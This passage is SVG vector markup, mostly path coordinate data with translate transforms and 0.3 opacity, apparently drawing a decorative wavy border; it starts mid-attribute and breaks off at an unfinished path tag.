1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path 